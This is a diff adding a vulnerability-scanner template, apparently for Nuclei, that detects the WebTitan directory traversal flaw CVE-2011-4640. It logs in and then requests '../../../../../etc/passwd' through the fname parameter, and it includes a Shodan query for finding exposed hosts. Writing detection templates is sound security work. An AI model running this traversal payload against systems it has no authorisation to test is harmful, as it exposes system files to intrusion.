diff --git a/http/cves/2011/CVE-2011-4640.yaml b/http/cves/2011/CVE-2011-4640.yaml new file mode 100644 index 0000000000..1faec7804f --- /dev/null +++ b/http/cves/2011/CVE-2011-4640.yaml @@ -0,0 +1,48 @@ +id: CVE-2011-4640 + +info: + name: WebTitan < 3.60 - Local File Inclusion + author: ctflearner + severity: medium + description: | + Directory traversal vulnerability in logs-x.php in SpamTitan WebTitan before 3.60 allows remote authenticated users to read arbitrary files via a .. (dot dot) in the fname parameter in a view action. + reference: + - https://www.exploit-db.com/exploits/37943 + - https://nvd.nist.gov/vuln/detail/CVE-2011-4640 + classification: + cvss-metrics: CVSS:2.0/AV:N/AC:L/Au:S/C:P/I:N/A:N + cvss-score: 4.0 + cve-id: CVE-2011-4640 + cwe-id: CWE-22 + cpe: cpe:2.3:a:spamtitan:webtitan:*:*:*:*:*:*:*:* + metadata: + max-request: 3 + shodan-query: title:"WebTitan" + tags: cve,cve2011,lfi,spamtitan,webtitan,authenticated + +http: + - raw: + - | + GET /login-x.php HTTP/1.1 + Host: {{Hostname}} + + - | + POST /login-x.php HTTP/1.1 + Host: {{Hostname}} + Content-Type: application/x-www-form-urlencoded + X-Requested-With: XMLHttpRequest + + jaction=login&language=en_US&username={{username}}&password={{password}} + + - | + GET /logs-x.php?jaction=view&fname=../../../../../etc/passwd HTTP/1.1 + Host: {{Hostname}} + + matchers: + - type: dsl + dsl: + - 'contains(body_2, "success\":true")' + - 'contains(body_1, "WebTitan")' + - "regex('root:.*:0:0:', body)" + - 'status_code_3 == 200' + condition: and